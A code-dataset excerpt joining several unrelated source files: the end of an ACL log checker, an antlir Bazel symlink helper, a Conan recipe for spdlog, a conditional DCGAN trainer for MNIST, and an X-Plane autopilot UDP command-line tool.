    acl_log = get_acl_log(args.entry_num)
    parsed_log = parse_acl_log(acl_log)
    # Express command line arguments as a dict, omitting any arguments that
    # were not provided by the user.
    expected = {k: v for k, v in vars(args).items() if v is not None}
    # entry_num selects which log line to check; it is not a log field.
    del expected["entry_num"]
    for key, val in expected.items():
        try:
            if parsed_log[key] != val:
                print(
                    f"Expected log {key}={val} but got {key}={parsed_log[key]} \
                        in:\n\t'{acl_log}"
                )
                exit(1)
        except KeyError:
            print(
                f"Expected log {key}={val} but {key} does not exist \
                    in:\n\t'{acl_log}'"
            )
            exit(1)
if __name__ == "__main__":
main()
| 3.15625 | 3 |
antlir/bzl/image/feature/symlink.bzl | facebookincubator/fs_image | 9 | 12766447 | <gh_stars>1-10
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
load("//antlir/bzl:shape.bzl", "shape")
load("//antlir/bzl:target_helpers.bzl", "antlir_dep")
load("//antlir/bzl:target_tagger.bzl", "new_target_tagger", "target_tagger_to_feature")
load(":symlink.shape.bzl", "symlink_t")
def _build_symlink_feature(link_target, link_name, symlinks_to_arg):
    """Shared implementation for the dir/file symlink features.

    Wraps a `symlink_t` shape (source = link_target, dest = link_name)
    in a target-tagger feature under the items key named by
    *symlinks_to_arg* ("symlinks_to_dirs" or "symlinks_to_files").
    """
    symlink_spec = shape.new(
        symlink_t,
        dest = link_name,
        source = link_target,
    )
    return target_tagger_to_feature(
        new_target_tagger(),
        items = struct(**{symlinks_to_arg: [symlink_spec]}),
        # The `fake_macro_library` docblock explains this self-dependency
        extra_deps = [antlir_dep("bzl/image/feature:symlink")],
    )
def feature_ensure_dir_symlink(link_target, link_name):
    """
    The operation follows rsync convention for a destination (`link_name`):
    `ends/in/slash/` means "write into this directory", `does/not/end/with/slash`
    means "write with the specified filename":

    - `feature.ensure_dir_symlink("/d", "/e/")` symlinks directory `/d` to `/e/d`
    - `feature.ensure_dir_symlink("/a", "/b/c")` symlinks directory `/a` to `/b/c`

    Both arguments are mandatory:

    - `link_target` is the image-absolute source file/dir of the symlink.
      This file must exist as we do not support dangling symlinks.

      IMPORTANT: The emitted symlink will be **relative** by default, enabling
      easier inspection of images via `buck-image-out`. If this is a problem
      for you, we can add an `absolute` boolean kwarg.

    - `link_name` is an image-absolute path. A trailing / is significant.

      A `link_name` that does NOT end in / is a full path in the new image,
      ending with a filename for the new symlink.

      As with `image.clone`, a trailing / means that `link_name` must be a
      pre-existing directory in the image (e.g. created via
      `image.ensure_dirs_exist`), and the actual link will be placed at
      `link_name/(basename of link_target)`.

    This item is idempotent: it is a no-op if a symlink already exists that
    matches the spec.
    """
    return _build_symlink_feature(link_target, link_name, "symlinks_to_dirs")
def feature_ensure_file_symlink(link_target, link_name):
    """
    The operation follows rsync convention for a destination (`link_name`):
    `ends/in/slash/` means "write into this directory", `does/not/end/with/slash`
    means "write with the specified filename":

    - `feature.ensure_file_symlink("/d", "/e/")` symlinks file `/d` to `/e/d`
    - `feature.ensure_file_symlink("/a", "/b/c")` symlinks file `/a` to `/b/c`

    Both arguments are mandatory:

    - `link_target` is the image-absolute source file/dir of the symlink.
      This file must exist as we do not support dangling symlinks.

      IMPORTANT: The emitted symlink will be **relative** by default, enabling
      easier inspection of images via `buck-image-out`. If this is a problem
      for you, we can add an `absolute` boolean kwarg.

    - `link_name` is an image-absolute path. A trailing / is significant.

      A `link_name` that does NOT end in / is a full path in the new image,
      ending with a filename for the new symlink.

      As with `image.clone`, a trailing / means that `link_name` must be a
      pre-existing directory in the image (e.g. created via
      `image.ensure_dirs_exist`), and the actual link will be placed at
      `link_name/(basename of link_target)`.

    This item is idempotent: it is a no-op if a symlink already exists that
    matches the spec.
    """
    return _build_symlink_feature(link_target, link_name, "symlinks_to_files")
| 2.03125 | 2 |
conanfile.py | memsharded/conan-spdlog | 6 | 12766448 | <reponame>memsharded/conan-spdlog
from conans import ConanFile
class spdlogConan(ConanFile):
    """Conan recipe for the header-only spdlog logging library."""
    name = "spdlog"
    version = "0.13.0"
    license = "MIT"
    url = "https://github.com/memsharded/conan-spdlog"
    # fmt_external=True links against a standalone fmt package instead of
    # the fmt copy bundled inside spdlog.
    options = {"fmt_external": [True, False]}
    default_options = "fmt_external=False"

    def requirements(self):
        # Only pull in fmt when the consumer opted out of the bundled copy.
        if self.options.fmt_external:
            self.requires("fmt/3.0.1@memsharded/stable")

    def source(self):
        # Fetch the pinned upstream tag matching self.version.
        self.run("git clone https://github.com/gabime/spdlog.git")
        self.run("cd spdlog && git checkout v%s" % self.version)

    def package(self):
        # Header-only: ship headers (and the .cc files fmt includes inline).
        self.copy("*.h", dst="include", src="spdlog/include")
        self.copy("*ostream.cc", dst="include", src="spdlog/include")
        if not self.options.fmt_external:
            self.copy("*format.cc", dst="include", src="spdlog/include")

    def package_info(self):
        if self.options.fmt_external:
            # Tell spdlog headers to include the external fmt.
            self.cpp_info.defines.append("SPDLOG_FMT_EXTERNAL")
| 2.21875 | 2 |
src/cdctrain.py | PoCInnovation/VanGaugan | 2 | 12766449 | import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision.utils as utils
import matplotlib.pyplot as plt
import numpy as np
from torch.utils.tensorboard import SummaryWriter
from celeba_dataset import CelebaDataset
from pathlib import Path
from generator import Generator, getImage, CGenerator, cDCGenerator
from discriminator import Discriminator, CDiscriminator, cDCDiscriminator
from sys import argv, exit, stderr
from datetime import date
BS = 128 # Batch size
LR = 0.0002 # Learning Rate (shared by both Adam optimizers)
IMG_SIZE = 64  # images are resized to IMG_SIZE x IMG_SIZE
N_CLASSES = 10  # number of conditional label classes (MNIST digits)
def loadMnistDataset():
    """Return a shuffled DataLoader over the MNIST training set, with
    images resized to IMG_SIZE and normalized to [-1, 1] (1 channel)."""
    return torch.utils.data.DataLoader( # Load MNIST DATASET
        dset.MNIST(
            './dataset',
            train=True,
            download=True,
            transform=transforms.Compose([
                transforms.Resize(IMG_SIZE),
                transforms.ToTensor(),
                # Mean/std of 0.5 maps pixel values into [-1, 1], matching
                # the generator's tanh-style output range.
                transforms.Normalize((0.5,), (0.5,))
            ])
        ),
        batch_size=BS, shuffle=True
    )
class CDCTrainer():
    """Trainer for a conditional DCGAN (cDCGAN).

    Holds a generator/discriminator pair plus their Adam optimizers and
    alternates discriminator and generator updates over a labelled image
    DataLoader. Losses are logged to TensorBoard under log/loss.
    """

    def __init__(self, ngpu):
        print(torch.cuda.is_available())
        # Train on GPU 0 when CUDA is available and a non-negative GPU count
        # was requested; fall back to CPU otherwise.
        device_type = "cuda:0" if torch.cuda.is_available() and ngpu >= 0 else "cpu"
        self.device = torch.device(device_type)
        self.GNet = cDCGenerator(ngpu).to(self.device)
        self.DNet = cDCDiscriminator(ngpu).to(self.device)
        print(self.device.type)
        # Spread both networks over several GPUs when more than one was requested.
        if self.device.type == "cuda" and ngpu > 1:
            device_ids = list(range(ngpu))
            self.GNet = nn.DataParallel(self.GNet, device_ids=device_ids)
            self.DNet = nn.DataParallel(self.DNet, device_ids=device_ids)
            print("GPU OK")
        self.GNet.init_weight()
        self.DNet.init_weight()
        # Adam optimizer -> Stochastic Optimization
        self.GOpti = optim.Adam(self.GNet.parameters(), lr=LR)
        self.DOpti = optim.Adam(self.DNet.parameters(), lr=LR)
        self.loss_fun = torch.nn.BCELoss()  # binary cross-entropy, standard GAN loss
        self.writter = SummaryWriter(log_dir='log/loss', comment='Training loss')  # TensorBoard logger
        # fill[c] is a one-hot-over-channels label map of shape
        # (N_CLASSES, IMG_SIZE, IMG_SIZE): the discriminator's conditioning
        # input for class c.
        self.fill = torch.zeros(10, 10, IMG_SIZE, IMG_SIZE, device=self.device)
        for i in range(0, N_CLASSES):
            self.fill[i, i, :, :] = 1

    def __del__(self):
        # Flush and close the TensorBoard writer when the trainer is dropped.
        self.writter.close()

    def trainGNet(self):
        """Run one generator update.

        Generates a batch of fakes with random labels and pushes the
        discriminator output towards 1 ("real").

        Returns:
            The generator BCE loss tensor.
        """
        self.GOpti.zero_grad()
        fake_labels = gen_fake_labels(BS, self.device)
        fake_labels_fill = self.fill[fake_labels]
        fake_imgs = self.GNet(self.createNoise(BS), fake_labels)
        validity = self.DNet(fake_imgs, fake_labels_fill)
        # Generator wants D to classify its fakes as real (target = 1).
        g_loss = self.loss_fun(validity, torch.ones(BS, 1, 1, 1, device=self.device))
        g_loss.backward()
        self.GOpti.step()
        return g_loss

    def trainDNet(self, fake_data, fake_labels, real_data, labels):
        """Run one discriminator update on a real batch and a generated batch.

        Args:
            fake_data: generated images (already detached from G's graph).
            fake_labels: class labels used to generate fake_data.
            real_data: real images from the DataLoader.
            labels: class labels of the real images.

        Returns:
            dict with the summed loss ("error") and D's raw outputs on the
            real ("realRes") and fake ("fakeRes") batches.
        """
        self.DOpti.zero_grad()
        labels_fill = self.fill[labels]
        fake_labels_fill = self.fill[fake_labels]
        # Real pictures should be classified as 1.
        real_validity = self.DNet(real_data, labels_fill)
        real_loss = self.loss_fun(real_validity, torch.ones(real_data.shape[0], 1, 1, 1, device=self.device))
        # Generated pictures should be classified as 0.
        fake_validity = self.DNet(fake_data, fake_labels_fill)
        fake_loss = self.loss_fun(fake_validity, torch.zeros(BS, 1, 1, 1, device=self.device))
        d_loss = real_loss + fake_loss
        d_loss.backward()
        self.DOpti.step()
        return {
            "error": d_loss,
            "realRes": real_validity,
            "fakeRes": fake_validity
        }

    def __call__(self, epoch, loader):
        """Train for *epoch* epochs over *loader*, saving models after each epoch."""
        for e in range(epoch):
            for i, (batch, labels) in enumerate(loader):
                print("iteration = ", i)
                # Move the batch and its labels onto the training device.
                # FIX: labels used to be moved with .cuda() whenever CUDA was
                # available, even when self.device was CPU, causing a device
                # mismatch inside trainDNet.
                real_imgs = batch.to(self.device)
                labels = labels.to(self.device)
                # Build a generated batch; detach so the D step cannot update G.
                fake_labels = gen_fake_labels(BS, self.device)
                fake_imgs = self.GNet(self.createNoise(BS), fake_labels).detach()
                DResult = self.trainDNet(fake_imgs, fake_labels, real_imgs, labels)
                # Two generator steps per discriminator step.
                for _ in range(0, 2):
                    GError = self.trainGNet()
                self.log(e, DResult['error'], GError)
            print(f"Epoch {e + 1} done", file=stderr)
            self.save("./models/default/" + str(date.today()) + "_g_" + str(e + 1),
                      "./models/default/" + str(date.today()) + "_d_" + str(e + 1))

    def log(self, epoch, DLoss, GLoss):
        """Print both losses and record them to TensorBoard under *epoch*."""
        print(f"epoch: {epoch}")
        print(f"Discriminator Loss : {DLoss}")
        print(f"Generator Loss : {GLoss}")
        print("==========================================")
        self.writter.add_scalar('Loss/Generator', GLoss, epoch)
        self.writter.add_scalar('Loss/Discriminator', DLoss, epoch)
        self.writter.add_scalars('Loss/Generator+Discriminator', {
            'Generator': GLoss,
            'Discriminator': DLoss
        }, epoch)

    def save(self, Gpath, Dpath):
        """Serialize generator and discriminator state dicts to the given paths."""
        torch.save(self.GNet.state_dict(), Gpath)
        torch.save(self.DNet.state_dict(), Dpath)

    def createNoise(self, n):
        """Return a (n, 100, 1, 1) standard-normal latent tensor on the training device."""
        return torch.randn(n, 100, 1, 1, device=self.device)

    def preprocess(self, rawData, nout):
        """Flatten each sample of *rawData* into a vector of length *nout*."""
        return rawData.view(rawData.size(0), nout)

    def reveal(self, data, i, j):
        """Reshape flat vectors back into single-channel (i, j) images."""
        return data.view(data.size(0), 1, i, j)
def gen_fake_labels(n, device='cpu'):
    """Draw *n* random class labels in [0, 10) as a 1-D tensor on *device*."""
    return torch.randint(0, 10, (n,), device=device)
def loadModel(path, Model):
    """Instantiate Model(0) and load its weights from *path* onto the CPU.

    Exits the program with an error message if the checkpoint cannot be
    read or applied.
    """
    net = Model(0)
    try:
        state = torch.load(path, map_location='cpu')
        net.load_state_dict(state)
    except Exception as error:
        exit(f"Error : {path} : {error}")
    return net
def load_and_show(path, label):
    """Load a conditional generator from *path* and display one sample for *label*."""
    generator = loadModel(path, CGenerator)
    noise = torch.randn(1, 100, 1, 1)
    sample = generator(noise, label).squeeze()
    plt.imshow(getImage(sample))
    plt.show()
def make_grid(modelPath):
    """Load a conditional generator and display an 8x8 grid of generated images."""
    generator = loadModel(modelPath, CGenerator)
    rand_labels = gen_fake_labels(64)
    noise = torch.randn(64, 100, 1, 1)
    samples = generator(noise, rand_labels).squeeze()
    plt.figure(figsize=(8, 8))
    plt.axis("off")
    plt.title("Generated images")
    grid = utils.make_grid(samples, padding=2, normalize=True)
    plt.imshow(grid.permute(1, 2, 0).detach().numpy())
    plt.show()
| 2.40625 | 2 |
xplane/cli/autopilot.py | tomleese/snakes-on-a-plane | 0 | 12766450 | import asyncio
import xplane.autopilot
import xplane.io
class MyProtocol(xplane.io.Protocol, xplane.autopilot.TakeoffMixin):
    """UDP protocol that forwards incoming X-Plane data packets to the takeoff mixin."""

    # NOTE: no __init__ override is needed — the previous one only delegated
    # to super().__init__(remote_addr), which is inherited unchanged.

    def got_data_packet(self, packet, address):
        # Hand each incoming data packet to the TakeoffMixin handler.
        self.take_off_got_data_packet(packet, address)
def mainloop(local_addr, remote_addr, action):
    """Bind a UDP endpoint on *local_addr*, start *action* on the protocol,
    and run the asyncio event loop until it is stopped."""
    loop = asyncio.get_event_loop()
    endpoint = loop.create_datagram_endpoint(
        lambda: MyProtocol(remote_addr), local_addr=local_addr)
    transport, protocol = loop.run_until_complete(endpoint)
    # Schedule the requested autopilot action (e.g. "takeoff") once the
    # loop starts running.
    start_action = getattr(protocol, action)
    loop.call_soon(start_action)
    loop.run_forever()
    transport.close()
    loop.close()
def main():
    """CLI entry point: parse host/port arguments and run the chosen action."""
    from argparse import ArgumentParser

    parser = ArgumentParser()
    parser.add_argument('send_host', type=str)
    parser.add_argument('--send-port', '-p', type=int, default=49000)
    parser.add_argument('--listen-host', '-b', type=str, default='0.0.0.0')
    parser.add_argument('--listen-port', '-P', type=int, default=49000)
    parser.add_argument('action', type=str, choices=['takeoff'])
    args = parser.parse_args()

    mainloop((args.listen_host, args.listen_port),
             (args.send_host, args.send_port),
             args.action)
| 2.5625 | 3 |